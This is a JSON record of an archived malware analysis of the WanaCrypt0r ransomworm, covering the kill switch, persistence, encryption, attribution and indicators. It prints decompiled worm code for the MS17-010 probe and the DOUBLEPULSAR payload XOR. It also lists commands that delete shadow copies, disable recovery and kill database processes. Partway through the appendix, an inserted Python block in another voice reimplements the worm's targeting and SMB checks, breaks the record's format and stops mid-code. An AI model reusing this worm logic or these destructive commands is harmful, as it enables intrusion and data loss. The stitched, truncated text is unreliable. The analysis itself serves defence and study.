{
	"id": "31139fec-7b8d-4089-9645-12ee9956215f",
	"created_at": "2026-04-06T00:06:28.526256Z",
	"updated_at": "2026-04-10T13:12:47.982585Z",
	"deleted_at": null,
	"sha1_hash": "e7e88a7a81f76e016b0d967a93062cb9021a01a0",
	"title": "WanaCrypt0r Ransomworm",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1053473,
	"plain_text": "WanaCrypt0r Ransomworm\r\nArchived: 2026-04-05 13:44:24 UTC\r\nWritten by Sergei Shevchenko and Adrian Nish\r\nBACKGROUND\r\nSince the release of the ETERNALBLUE exploit by ‘The Shadow Brokers’ last month security researchers have\r\nbeen watching for a mass attack on global networks. This came on Friday 12th May when it was bundled with\r\nransomware called WanaCrypt0r and let loose. Initial reports of attacks were highlighted by Telefonica in Spain\r\nbut the malware quickly spread to networks in the UK where the National Health Service (NHS) was impacted,\r\nfollowed by many other networks across the world.\r\nThe infographic below illustrates the key components of the WanaCrypt0r ransomware. This is described in\r\nfurther detail in subsequent sections of this report along with initial clues on attribution.\r\nANALYSIS: Initial Vector\r\nThe initial infection vector is still unknown. Reports by some of phishing emails have been dismissed by other\r\nresearchers as relevant only to a different (unrelated) ransomware campaign, called Jaff.\r\nThere is also a working theory that initial compromise may have come from SMB shares exposed to the public\r\ninternet. Results from Shodan show over 1.5 million devices with port 445 open – the attacker could have infected\r\nhttps://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html\r\nPage 1 of 22\n\nthose shares directly.\r\nThe Dropper/Worm\r\nThe infection starts from a 3.6Mb executable file named mssecsvc.exe or lhdfrgui.exe . 
Depending on how\r\nit is executed, it can function as a dropper or as a worm.\r\nWhen run, the executable first checks whether it can connect to the following URL:\r\nhttp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\r\nThe connection is checked with the WinINet functions, shown below:\r\nqmemcpy(\u0026szUrl, \"http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\", 57u);\r\nh1 = InternetOpenA(0, INTERNET_OPEN_TYPE_DIRECT, 0, 0, 0);   // direct access: no proxy is consulted\r\nh2 = InternetOpenUrlA(h1, \u0026szUrl, 0, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, 0);\r\nif (h2)\r\n{\r\n    InternetCloseHandle(h1);   // if the connection succeeds, then quit\r\n    InternetCloseHandle(h2);\r\n    result = 0;\r\n}\r\nelse\r\n{\r\n    InternetCloseHandle(h1);   // if the connection fails\r\n    InternetCloseHandle(0);\r\n    PAYLOAD();                 // then call the payload\r\n    result = 0;\r\n}\r\nreturn result;\r\nThat means that if the executable is unable to connect to the URL above, it will call the payload. The same logic fires on any\r\nsystem that has no route to the internet at all, such as an air-gapped system within a hospital network.\r\nIt is also worth noting that this connection is not proxy aware (the handle is opened with INTERNET_OPEN_TYPE_DIRECT), so in an\r\nenterprise IT environment where outbound web access is only possible through a proxy the check is unlikely to reach the domain,\r\nand the payload is triggered.\r\nIf the executable is run with no command line parameters, it will register and then run itself as a service:\r\nService name: \"mssecsvc2.0\"\r\nService Description: \"Microsoft Security Center (2.0) Service\"\r\nService executable: \"%ORIGINAL_NAME% -m security\"\r\nwhere %ORIGINAL_NAME% is the original name of the executable, such as mssecsvc.exe or lhdfrgui.exe .\r\nNext, it will start the created service. 
The payload of the executable will load its own resource called \"R/1831\" ,\r\nand save it as c:\\windows\\tasksche.exe .\r\nAny existing c:\\windows\\tasksche.exe file is first renamed to c:\\windows\\qeriuwjhrf .\r\nFinally, the executable will execute the dropped resource as:\r\n\"c:\\windows\\tasksche.exe /i\"\r\nIf this executable is started as a service, its service handling procedure will invoke the network replication code,\r\nexplained below.\r\nEternalBlue Port\r\nSince the Shadow Brokers leaked the EquationGroup / NSA FuzzBunch software, a researcher with the handle\r\n@zerosum0x0 has reverse engineered the ETERNALBLUE SMBv1/SMBv2 exploit against Windows Server\r\n2008 R2 SP1 x64. This was released on 21st April 2017.\r\nAs @zerosum0x0 predicted:\r\n“Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in\r\nthe FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system\r\nprivileges... This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era\r\nthan the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a\r\ndecade of breaches emanating from MS17-010 exploits. 
It is the perfect storm for one of the most damaging\r\nmalware infections in computing history.”\r\nThis work was further expanded on with an open-source project \"MS17-010 Windows SMB RCE\", developed by\r\nRiskSense Operations, which includes both a Metasploit scanner and a Python port.\r\nOn 9th May 2017, the Python port was further improved to \"Store original shellcode in binary, rather than\r\npython string representation\".\r\nIn order to \"Make it faster\", the shellcode was now declared as binary, further lowering the barrier to porting it\r\ninto C++ code.\r\nIt appears that the ransomware took advantage of the published Python source, along with the shellcode binaries –\r\nthe SMB structures found in the ransomware are identical to the published ones (e.g. the “Exploits” section of this\r\nproject was used to infect remote hosts with the DOUBLEPULSAR backdoor). The published raw SMB packets\r\nappear to have been copy-pasted into C++ code and recompiled together with the ported blobs – most likely without even\r\nunderstanding how the EternalBlue SMBv1/SMBv2 exploit actually works.\r\nA detailed description of the network replication and worm functionality is given in Appendix B.\r\nThe Payload\r\nThe payload is a 3.4Mb file called tasksche.exe , created from the worm's resource \"1831\" . Such a large size\r\nis explained by the bundled TOR executables along with other tools and configuration files.\r\nThe internal name of this executable is diskpart.exe .\r\nThis file contains another embedded resource, named \"XIA/2058\" . 
This resource is a ZIP file.\r\nIf the file detects it was executed without the \"/i\" switch – that is, it was not executed by the worm – it will\r\nregister itself as a service to provide itself with a persistence mechanism that does not require the worm.\r\nFor that, it will first generate a pseudo-random name that is derived from the current computer name, for\r\nexample tdyhddeaprj852 .\r\nNext, it will create read-only directories, and copy itself into those directories, such as:\r\n  •   c:\\ProgramData\\%RANDOM_NAME%\\%EXE_NAME%\r\n  •   c:\\Intel\\%RANDOM_NAME%\\%EXE_NAME%\r\nwhere %RANDOM_NAME% is the previously generated pseudo-random name, and %EXE_NAME% is the name of its own\r\nexecutable.\r\nFor example:\r\n  •   c:\\ProgramData\\tdyhddeaprj852\\tasksche.exe\r\n  •   c:\\Intel\\tdyhddeaprj852\\tasksche.exe\r\nNext, it will create a new service:\r\nService name: %RANDOM_NAME%\r\nService Description: %RANDOM_NAME%\r\nService executable: \"cmd.exe /c %FULL_PATH_FILENAME%\"\r\nwhere %FULL_PATH_FILENAME% is the full path filename of the malicious executable.\r\nFollowing this, it starts the service or directly runs the newly created executable as:\r\n\"cmd.exe /c %FULL_PATH_FILENAME%\"\r\nTo make sure there is only one copy of the executable running, it relies on a mutex named:\r\n\"Global\\\\MsWinZonesCacheCounterMutexA\"\r\nEncryption Phase\r\nThe malware then proceeds to its file encryption phase.\r\nIt will register its working directory in the registry value:\r\nHKLM\\SOFTWARE\\WanaCrypt0r\\wd: \"%WORKING_DIR%\"\r\nNext, it will unzip its embedded resource \"XIA/2058\" into the working directory, using the ZIP password\r\n\"WNcry@2ol7\" .\r\nThis will create a number of files, such as a command line TOR executable, required libraries, ransom\r\nmessages in various languages, and other tools:\r\n  •   b.wnry – a bitmap image with the ransom note in it\r\n  •   c.wnry – binary 
configuration file\r\n  •   r.wnry – a text file with the ransom note in it\r\n  •   s.wnry – a ZIP file with the command line TOR executable and required libraries\r\n  •   t.wnry – encrypted ransomware DLL\r\n  •   taskdl.exe – an executable that enumerates and deletes temp files on each drive, looking for files\r\nwith the .WNCRYT extension in %DRIVE%:\\$RECYCLE and %TEMP% directories\r\n  •   taskse.exe – an executable that starts @WanaDecryptor@.exe\r\n  •   u.wnry – the ransomware’s decryptor executable, which opens a GUI with a ransom note in it\r\n  •   msg\\m_*.wnry – a directory with ransom notes in different languages\r\nIt will then read the unzipped configuration file c.wnry – this file contains the following list of .onion\r\ndomains:\r\ngx7ekbenv2riucmf.onion\r\n57g7spgrzlojinas.onion\r\nxxlvbrloxvriy2c5.onion\r\n76jdd2ir2embyv47.onion\r\ncwwnhwhlz52maqm7.onion\r\nNext, it picks a random Bitcoin address out of three hard-coded ones – the list below shows the balances at the\r\ntime of analysis:\r\n13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 - 15.13562354 BTC = $26410\r\n12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw - 13.78022431 BTC = $24045\r\n115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn - 5.98851225 BTC = $17361\r\nHence, the total amount of ransom collected at the time of writing is ~USD$68K.\r\nThe selected Bitcoin address is then saved back into the c.wnry file, so this file doubles as the runtime\r\nconfiguration store.\r\nNext, the ransomware runs the following commands to assign the 'hidden' attribute to all of its files and to allow full\r\naccess rights for all users:\r\n\"attrib +h .\"\r\n\"icacls . /grant Everyone:F /T /C /Q\"\r\nIt then imports a 2048-bit RSA key from a hard-coded 1,172-byte blob stored within the executable. 1,172 bytes is\r\nexactly the size of a CryptoAPI PRIVATEKEYBLOB for a 2048-bit RSA key (a PUBLICKEYBLOB would be 276 bytes), so the\r\nblob carries the private half of the key pair, which is what the next step needs. 
Next,\r\nit reads the unzipped resource file t.wnry , which starts with a \"WANACRY!\" marker, and decrypts the AES key stored\r\nthere with the imported RSA key.\r\nThe recovered AES key is then used to decrypt the rest of the t.wnry file contents, using AES-128 (CBC).\r\nThe blob decrypted from t.wnry turns out to be a PE file: the malware parses its PE header, maps it into newly\r\nallocated memory, and calls its entry point.\r\nThis PE file is a DLL, and the called entry point corresponds to its DllEntryPoint() export.\r\nThe internal name of this DLL is kbdlv.dll . The malware locates and then calls its export TaskStart().\r\nThe Ransomware DLL\r\nThe main DLL module of the ransomware has the internal name kbdlv.dll . Its export TaskStart() is called to\r\ninvoke the ransomware’s file encryption logic.\r\nThe DLL first creates a mutex \"MsWinZonesCacheCounterMutexA\" to make sure there is only one copy of the\r\nransomware activated. Next, it reads c.wnry - the configuration file that stores the list of TOR services.\r\nThe ransomware will attempt to terminate a number of processes, such as SQL server and MS Exchange server\r\n(presumably so that the database and mailbox files they hold open can be encrypted), by running the commands:\r\ntaskkill.exe /f /im mysqld.exe\r\ntaskkill.exe /f /im sqlwriter.exe\r\ntaskkill.exe /f /im sqlserver.exe\r\ntaskkill.exe /f /im MSExchange*\r\ntaskkill.exe /f /im Microsoft.Exchange.*\r\nIt will then spawn a number of threads, including a file encryption thread.\r\nIt will not attempt to encrypt files within directories that contain the following strings in their names:\r\n  •   \\Intel\r\n  •   \\ProgramData\r\n  •   \\WINDOWS\r\n  •   \\Program Files\r\n  •   \\Program Files (x86)\r\n  •   \\AppData\\Local\\Temp\r\n  •   \\Local Settings\\Temp\r\n  •   This folder protects against ransomware. 
Modifying it will reduce protection\r\n  •   Temporary Internet Files\r\n  •   Content.IE5\r\nBefore the encrypted files are written, the ransomware checks the free disk space with GetDiskFreeSpaceExW() to\r\nmake sure it does not run out of free space.\r\nFinally, the DLL creates a copy of the previously unzipped file u.wnry , saving and then running it as\r\n@WanaDecryptor@.exe.\r\nThe Ransomware EXE\r\nThe EXE module @WanaDecryptor@.exe is run by the DLL (it is a copy of the previously unzipped file u.wnry ). It\r\nis a GUI application with the window name \"Wana Decrypt0r 2.0\" .\r\nTo delete Windows shadow copies and disable boot-time recovery, it runs the commands:\r\ncmd.exe /c vssadmin delete shadows /all /quiet \u0026\r\nwmic shadowcopy delete \u0026\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures \u0026\r\nbcdedit /set {default} recoveryenabled no \u0026\r\nwbadmin delete catalog -quiet\r\nAll of these require administrative rights, so the removal of recovery points only succeeds where the ransomware is\r\nrunning elevated, as it is when delivered through the kernel-mode DOUBLEPULSAR path described in Appendix B.\r\nThis executable will connect to C\u0026C via TOR .onion domains, in order to anonymise its C\u0026C traffic.\r\nOnce the ransom is paid, the executable is able to check the status of the payment, and allow file decryption.\r\nAttribution\r\nThe WanaCrypt0r ransomware released on 12th May is not the only version. 
Earlier this year, there was another\r\nversion released (example MD5: 9c7c7149387a1c79679a87dd1ba755bc ).\r\nThe older version has a timestamp of 9th February 2017, and was first submitted to VirusTotal on 10th February\r\n2017.\r\nSimilar to the latest version, it also relies on external files, but with the extension .wry instead of .wnry :\r\n  •   n.wry\r\n  •   cg.wry\r\n  •   t1.wry\r\n  •   t2.wry\r\nThe latest version downloads a TOR client from:\r\nhttps://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip\r\nThe older version downloads a TOR client from:\r\nhttps://www.torproject.org/dist/torbrowser/6.0.8/tor-win32-0.2.8.11.zip\r\nBoth the old and the new version extract the ZIP file into the TaskData folder.\r\nIt is worth noting that the older variant of the ransomware also attempted to replicate across \\\\%IP%\\ipc$ network\r\nshares. Hence, the idea of network replication was brewing in the attackers' minds long before 'The Shadow\r\nBrokers' release.\r\nThe older version of WanaCrypt0r ransomware relies on a function that generates a random buffer, using an\r\ninternal table that consists of 75 WORDs (screenshot in the original post):\r\nThe implementation of this function is highly distinctive - it cannot be found in any legitimate software. The only other\r\nsample where this function can also be found (almost identical, but with minor tweaks) is a sample of the Contopee\r\nbackdoor (MD5: ac21c8ad899727137c4b94458d7aa8d8 ), first submitted to VirusTotal on 15th August 2015.\r\nThis code overlap was first noticed and tweeted by Google researcher Neel Mehta. This was quickly followed up\r\non by Kaspersky Labs in a blogpost.\r\nThe Contopee backdoor sample uses this function as part of its communication protocol with the C\u0026C server. 
This\r\nbackdoor family is a tool from the Lazarus threat actors.\r\nThe re-use of code is a characteristic of the Lazarus group that we noted in our report last year on attacks against\r\nSWIFT systems. This re-use is at the source-code level, providing strong evidence of a common development\r\nenvironment.\r\nThis, along with other overlaps with Lazarus’ previous campaigns, is summarised below (characteristic | Lazarus code\r\nexample | WanaCrypt0r example):\r\nRandom buffer generator function | August 2015, Contopee backdoor: ac21c8ad899727137c4b94458d7aa8d8 | January 2017,\r\nWanaCrypt0r: 9c7c7149387a1c79679a87dd1ba755bc\r\nCode / Compiler | C++ / Visual Studio 6.0 | C++ / Visual Studio 6.0\r\n‘leetspeak’ | y0uar3@s!llyid!07 (referenced in the US-CERT alert following the SONY attack) | WANACRY! and WNcry@2ol7\r\nCryptoCurrency | Lazarus has targeted Bitcoin-related companies in recent months – possibly looking for ways to\r\nsteal/launder funds; a watering-hole (the same as described in our blog) was set up in February on a popular Bitcoin\r\nwebsite | WanaCrypt0r uses Bitcoin addresses to receive ransom payments\r\nAs noted in our attribution post last year, use of Visual Studio 6.0 is not a significant observation on its own –\r\nhowever, this development environment dates from 1998 and is rarely used by malware coders. Nonetheless, it has\r\nbeen seen repeatedly with Lazarus attacks.\r\nCONCLUSIONS\r\nCoupling an SMB worm to ransomware has created a highly effective threat – albeit one which wreaks havoc for\r\nrelatively little monetary gain. Even though $68K may represent a modest profit for the attackers, moving the\r\nmoney from those bitcoin wallets will attract significant attention from law-enforcement and could identify their\r\nmoney-laundering networks. 
It is very likely they will not get their hands on any money once this is all over.\r\nWhilst the SMB worm code has been copy/pasted from elsewhere, the ransomware author is clearly an\r\nexperienced malware developer. They include checks such as file paths of anti-ransomware products to avoid detection\r\nof their operation. There are mistakes though, such as the “kill-switch” which has been widely discussed.\r\nAssuming they used the Python port of the code released on 9th May, this implies a very short turnaround between\r\ndevelopment and attack; it is therefore possible the worm got loose whilst the code was still in testing. Either way,\r\nthe attackers will learn from this campaign, and may return with updated code whilst vulnerabilities remain\r\nunpatched.\r\nThe linkages to the Lazarus campaign are tantalising clues as to who may be ultimately behind this. Following on\r\nfrom last year's attacks on SWIFT systems and this year's attacks on banks in Poland \u0026 Mexico, they continue to\r\ndemonstrate that they are a considerable menace to network defenders. Understanding their tools, techniques and\r\nprocedures is challenging given the shifting nature of the attacks seen, but it deserves maximum focus and co-operation across the security community.\r\nThe biggest lesson to be learned from this attack, though, is the on-going challenge which organisations running\r\ncritical infrastructure face with patching. This isn’t the first case of self-propagating malware impacting healthcare\r\nnetworks we’ve investigated; indeed this reminds us a lot of the QBot/Qakbot episode last year. Then, as now,\r\nhospitals are exposed by running on out-of-date systems and with minimal resources to spend on security. 
The\r\nWanaCrypt0r campaign has brought this to international attention – how to fix the problem going forward will\r\nneed swift debate among technology experts and policy makers to avert similar crises in future.\r\nRECOMMENDATIONS\r\n  •  Install patch MS17-010 as a matter of urgency. For out-of-support operating systems such as XP, Win8\r\nand Server 2003 apply the out-of-band patch.\r\n  •  Add the following SNORT rules to IDS devices:\r\nhttp://doc.emergingthreats.net/bin/view/Main/2024218\r\n  •  Block all outgoing connections on ports 137, 139, 445 and 3389 (i.e. internal to external) to stop the\r\nworm spreading externally.\r\n  •  Block all incoming connections on ports 137, 139, 445 and 3389 (i.e. external to internal) to stop the\r\nworm coming into the network.\r\n  •  Consider blocking connections on port 445 (SMB shares) internally if not business critical until the\r\nworm has subsided.\r\n  •  Ensure that connections to the domain www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com are\r\npermitted. This site is reported to act as a kill switch, for some variants, preventing encryption. Bear in mind that the\r\ncheck is not proxy aware (see The Dropper/Worm above): permitting the domain on a web proxy does nothing for hosts\r\nwithout direct outbound access, so a sinkhole that answers the HTTP request from inside the network is the more\r\nreliable way to trigger the switch. Connectivity can be tested with the following python script.\r\nWe also suggest noting the recommendations from:\r\n  NCSC-UK: https://www.ncsc.gov.uk/news/latest-statement-international-ransomware-cyber-attack-0\r\n  CIRCL: https://www.circl.lu/pub/tr-41/\r\n  Microsoft: blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/\r\nAPPENDIX A – Indicators of compromise\r\nC\u0026C Domain\r\ngx7ekbenv2riucmf[.]onion\r\n57g7spgrzlojinas[.]onion\r\nxxlvbrloxvriy2c5[.]onion\r\n76jdd2ir2embyv47[.]onion\r\ncwwnhwhlz52maqm7[.]onion\r\niuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com\r\nMD5 
Hashes\r\n4fef5e34143e646dbf9907c4374276f5\r\n509c41ec97bb81b0567b059aa2f50fe8\r\n7bf2b57f2a205768755c07f238fb32cc\r\n7f7ccaa16fb15eb1c7399d422f8363e8\r\n8495400f199ac77853c53b5a3f278f3e\r\n84c82835a5d21bbcf75a61706d8ab549\r\ndb349b97c37d22f5ea1d1841e3c89eb4\r\nf107a717f76f4f910ae9cb4dc5290594\r\nAPPENDIX B – The Network Replicator\r\nThe worm replicates across the network using two threads: the first one provides replication across the local\r\nnetwork, and the second one across random IP ranges, thus affecting external addresses (such as honeypots or\r\nother exposed SMB shares).\r\nTo replicate across the internal network, the worm first calls GetAdaptersInfo() to obtain the network configuration of\r\neach network adapter associated with the system.\r\nThe network configuration allows it to use the current IP address and mask to build a list of local IP addresses.\r\nFor example, if the local IP address is 192.168.78.132 , and the subnet mask is 255.255.255.0 , the worm builds\r\na list of 254 IP addresses, stored as little-endian DWORDs (the in-memory form of an inet_addr() result), such as 014EA8C0\r\n( \"192.168.78.1\" ), 024EA8C0 ( \"192.168.78.2\" ), and up to FE4EA8C0 ( \"192.168.78.254\" ).\r\nNOTE: the constructed list is terminated with BAADF00D markers.\r\nThis list is then passed to a newly spawned thread to enumerate it, and the worm will then attempt to replicate to\r\neach target in the list.\r\nThe second network replication thread is spawned every 2 seconds, up to 128 times. Each instance of this thread\r\nwill generate a random IP consisting of 4 octets.\r\nEach octet is a random value from 0 to 255, generated using the CryptGenRandom() API - a cryptographically secure\r\npseudorandom number generator.\r\nThe first octet IP1 cannot be set to 127 , 224 , or 225 . 
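The two target-generation paths described above (the local-subnet list built from the adapter address and mask, and the CSPRNG-drawn random external address with its excluded first octets), together with the /24 sweep the worm performs after a successful connect, as an added Python example. This is not code from the original post or from the worm: the adapter address, mask and flow records are constructed inputs, and the flag_smb_sweeps() heuristic at the end (a source opening TCP/445 to many distinct hosts inside one /24) is my own detection logic, added to show what the local-subnet pass looks like in a flow log.

```python
import secrets
import struct
from collections import defaultdict
from ipaddress import IPv4Address, IPv4Network

# Constructed sample input: the adapter address and mask quoted in the text.
SAMPLE_IP = '192.168.78.132'
SAMPLE_MASK = '255.255.255.0'

# First-octet values the random-target thread never uses (127, 224, 225).
EXCLUDED_FIRST_OCTETS = {127, 224, 225}
LIST_TRAILER = 0xBAADF00D   # marker appended after the last local address


def as_dword(ip):
    # The worm keeps each target as the little-endian DWORD returned by
    # inet_addr(): the bytes C0 A8 4E 01 read back as 0x014EA8C0.
    return struct.unpack('<I', IPv4Address(ip).packed)[0]


def local_targets(ip, mask):
    # Every host address of the adapter's own subnet, from .1 up to the
    # address before the broadcast address (254 entries for a /24).
    net = IPv4Network((ip, mask), strict=False)
    return [str(h) for h in net.hosts()]


def local_target_list_dwords(ip, mask):
    # The in-memory form: one DWORD per host, terminated by the BAADF00D marker.
    return [as_dword(h) for h in local_targets(ip, mask)] + [LIST_TRAILER]


def random_external_target(rng=secrets.randbelow):
    # Four octets from a CSPRNG (secrets stands in for CryptGenRandom); the
    # first octet is redrawn while it falls in the excluded set.
    first = rng(256)
    while first in EXCLUDED_FIRST_OCTETS:
        first = rng(256)
    return '%d.%d.%d.%d' % (first, rng(256), rng(256), rng(256))


def class_c_sweep(ip):
    # Once a random host accepts the connect on 445, the worm walks the whole
    # /24 from .1 to .255 inclusive (255 entries, broadcast address included).
    a, b, c, _ = (int(x) for x in ip.split('.'))
    return ['%d.%d.%d.%d' % (a, b, c, d) for d in range(1, 256)]


def flag_smb_sweeps(events, threshold=32):
    # Detection heuristic (mine, not from the report): a source that opens
    # TCP/445 to at least threshold distinct hosts inside one /24 is a sweep.
    # events: iterable of (src_ip, dst_ip, dst_port) tuples from a flow log.
    seen = defaultdict(set)
    for src, dst, dport in events:
        if dport == 445:
            seen[(src, str(IPv4Network(dst + '/24', strict=False)))].add(dst)
    return sorted({src for (src, _), dsts in seen.items() if len(dsts) >= threshold})


if __name__ == '__main__':
    lst = local_target_list_dwords(SAMPLE_IP, SAMPLE_MASK)
    print('%d local targets, first 0x%08X, last 0x%08X, trailer 0x%08X'
          % (len(lst) - 1, lst[0], lst[-2], lst[-1]))
    # Constructed flow log: the infected host sweeping its own subnet, plus a
    # legitimate client talking to three file servers.
    flows = [(SAMPLE_IP, t, 445) for t in local_targets(SAMPLE_IP, SAMPLE_MASK)]
    flows += [('192.168.78.10', '192.168.78.%d' % n, 445) for n in (20, 21, 22)]
    print('sweeping sources:', flag_smb_sweeps(flows))
```

The threshold of 32 distinct hosts is an arbitrary starting point; the worm touches all 254 hosts of its /24 within seconds, so even a much lower threshold over a short window separates it from ordinary file-share traffic.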
If the worm is able to connect to a target with IP address\r\nIP1.IP2.IP3.IP4 over port 445 , it will then enumerate 255 IP addresses from IP1.IP2.IP3.1 to\r\nIP1.IP2.IP3.255 . The worm will attempt to replicate to each enumerated target.\r\nThis thread is spawned 128 times - the round number is passed to the thread as an argument, so it is aware of\r\nthe current round of its own execution. The thread uses it along with an internal timer (using 20 and 40 minute\r\nintervals) to decide when to regenerate the IP1 and IP2 parts of the random IPs.\r\nBoth threads rely on the same network propagation mechanism: for each target IP, the worm first attempts to\r\nconnect on port 445 and submit two SMB requests, in an attempt to establish whether the MS17-010 SMB\r\nvulnerability exists:\r\n  •   negotiate_proto_request\r\n  •   session_setup_andx_request\r\nThe code below shows how these packets are submitted:\r\nname.sa_family = 2;                                // AF_INET\r\n*(_DWORD *)\u0026name.sa_data[2] = inet_addr(cp);    // target IPv4 address\r\n*(_WORD *)\u0026name.sa_data[0] = htons(hostshort);  // target port (445)\r\nhSocket = socket(2, 1, 0);                         // AF_INET, SOCK_STREAM\r\n__hSocket = hSocket;\r\nif (hSocket != -1)\r\n{\r\n    if (connect(hSocket, \u0026name, 16) != -1\r\n        \u0026\u0026 send(__hSocket, negotiate_proto_request, 88, 0) != -1\r\n        \u0026\u0026 recv(__hSocket, \u0026buf, 1024, 0) != -1\r\n        \u0026\u0026 send(__hSocket, session_setup_andx_request, 103, 0) != -1\r\n        \u0026\u0026 recv(__hSocket, \u0026buf, 1024, 0) != -1)\r\n    {\r\n        ...   // continues with the Tree Connect and PeekNamedPipe exchange described below\r\n    }\r\n}\r\nOn a network level, WireShark recognises these two packets as Negotiate Protocol Request and Session Setup\r\nAndX Request.\r\nNegotiate Protocol Request (screenshot in the original post):\r\nSession Setup AndX Request (screenshot in the original post):\r\nThe disassembled source of the worm shows how the Negotiate Protocol Request is built (screenshot in the original post):\r\nThe disassembled source shows the Session Setup AndX Request (only the end of it is shown; screenshot in the original post):\r\nThe Session Setup 
AndX Request will get a response, and the code parses it to extract the native_os field from\r\nit.\r\nFollowing this, the worm composes an IPC share name of the form \\\\%IP%\\IPC$ for the target, which is what the\r\n__TREEPATH_REPLACE__ placeholder below is replaced with.\r\nNext, the ransomware submits two other SMB requests:\r\n  •   tree_connect_andx_request\r\n  •   peeknamedpipe_request\r\nFirst, the Tree Connect AndX Request (screenshot in the original post):\r\nOnce the host responds, the code will read tree_id , process_id , user_id , and multiplex_id , in order to\r\nconstruct a new SMB request. In that new request, the following placeholders within the request templates will be\r\nreplaced with the extracted values:\r\n  •   __TREEID__PLACEHOLDER__\r\n  •   __USERID__PLACEHOLDER__\r\n  •   __TREEPATH_REPLACE__\r\nThe PeekNamedPipe Request is then submitted (screenshot in the original post).\r\nThe SMB header extracted from the received response is then parsed to see if the nt_status contained in it equals\r\n0xC0000205 (STATUS_INSUFF_SERVER_RESOURCES). Here is how the malware compares the four bytes of that status, which\r\nappear on the wire in little-endian order as 05 , 02 , 00 , C0 :\r\nif (send(__hSocket, peeknamedpipe_request, 78, 0) != -1   // if sent\r\n    \u0026\u0026 recv(__hSocket, \u0026buf, 1024, 0) != -1              // and recv() is OK\r\n    \u0026\u0026 nt_status_0 == 5                                  // and nt_status byte #0 == 05\r\n    \u0026\u0026 nt_status_1 == 2                                  // and nt_status byte #1 == 02\r\n    \u0026\u0026 !nt_status_2                                      // and nt_status byte #2 == 00\r\n    \u0026\u0026 nt_status_3 == 0xC0u)                             // and nt_status byte #3 == C0\r\n{                                                           // i.e. nt_status == 0xC0000205\r\n    closesocket(__hSocket);\r\n    return 1;                                               // return TRUE, host is vulnerable to MS17-010\r\n}\r\n...\r\nreturn 0;                                                   // return FALSE – the host is NOT vulnerable\r\nIf the host is vulnerable to MS17-010, the worm waits for three seconds and then checks if it is already infected\r\nwith DOUBLEPULSAR – in order to replicate itself, it needs an active DOUBLEPULSAR backdoor to be\r\ninstalled at the host.\r\nIn order to check that, it builds and then submits an SMB Trans2 Request, trans2_request .\r\nAs seen below, the subcommand field within 
trans2_request request is set to SESSION_SETUP , which is a\r\ncovert beacon request to the DOUBLEPULSAR backdoor.\r\nIf the host is infected with DOUBLEPULSAR, the response will contain \"Multiplex ID\" set to 81 ( 0x51 ).\r\nHere, the worm sends the trans2_request request, and checks if multiplex_id equals 0x51 :\r\nif (send(hSocket, trans2_request, 82, 0) != -1   // if send() OK\r\n    \u0026\u0026 recv(hSocket, \u0026buf, 1024, 0) != -1       // and recv() OK\r\n    \u0026\u0026 multiplex_id == 0x51)                     // and DoublePulsar is active\r\n...\r\n    return 1;                                    // return TRUE, is backdoored\r\nIf the scanned host is infected with DOUBLEPULSAR, the worm will calculate an XOR key from the SMB’s\r\nSignature1 field ( sig ):\r\nunsigned int calculate_doublepulsar_xor_key(unsigned int sig)\r\n{\r\n    return 2 * sig ^ ((((sig \u003e\u003e 16) | sig \u0026 0xFF0000) \u003e\u003e 8) |\r\n                      (((sig \u003c\u003c 16) | sig \u0026 0xFF00) \u003c\u003c 8));\r\n}\r\nThis XOR key will later be used as a basic stream cipher to encrypt the payload submitted over SMB:\r\nint xor_payload(int xor_key, char *buf, int size)\r\n{\r\n    int i = 0;\r\n    char __xor_key[5];\r\n    *(int *)\u0026__xor_key[1] = 0;\r\n    *(int *)__xor_key = xor_key;      // the four key bytes, little-endian\r\n    if (size \u003c= 0)\r\n        return 0;\r\n    do\r\n    {\r\n        buf[i] ^= __xor_key[i % 4];   // repeating 4-byte XOR\r\n        ++i;\r\n    }\r\n    while (i \u003c size);\r\n    return 0;\r\n}\r\nBecause the key is derived from a value the implant returns in the clear, this \"encryption\" is only obfuscation: anyone\r\nholding a capture of the exchange can recompute the key and recover the transferred payload.\r\nThe worm next constructs a new SMB packet. The data contained in the packet will contain malicious shellcode.\r\nFor example, if the target is x64, the shellcode will first walk backwards to find ntoskrnl.exe in kernel\r\nmemory (screenshot in the original post).\r\nNext, it parses ntoskrnl.exe ’s export table, and dynamically obtains the addresses of a number of its exports – the\r\nexports are found by hashes, a common approach used in shellcode. 
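The MS17-010 status check, the DOUBLEPULSAR ping check and the XOR-key routines above, in one added Python example that is not code from the original post or from the worm: it parses the 32-byte SMB1 header of a response, applies the two decisions the worm makes (nt_status equal to 0xC0000205 for MS17-010, multiplex_id equal to 0x51 for an active implant), derives the XOR key from the first DWORD of the signature field exactly as calculate_doublepulsar_xor_key() does, and applies the 4-byte XOR per 4 KB chunk. The responses it parses are test vectors the block constructs itself; the 0x41 multiplex id returned by a clean host is taken from public DOUBLEPULSAR analyses rather than from this report.

```python
import struct

# SMB1 wire layout (little-endian): 4-byte NetBIOS session header, then the
# 32-byte SMB header. Field order: magic, command, NT status, flags, flags2,
# PID high, 8-byte signature, reserved, TID, PID, UID, MID.
SMB_MAGIC = bytes.fromhex('ff') + b'SMB'
SMB_HEADER = struct.Struct('<4sBIBHH8sHHHHH')
NETBIOS_SESSION = struct.Struct('>I')          # type 0x00 followed by a 24-bit length

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205    # on the wire: 05 02 00 C0
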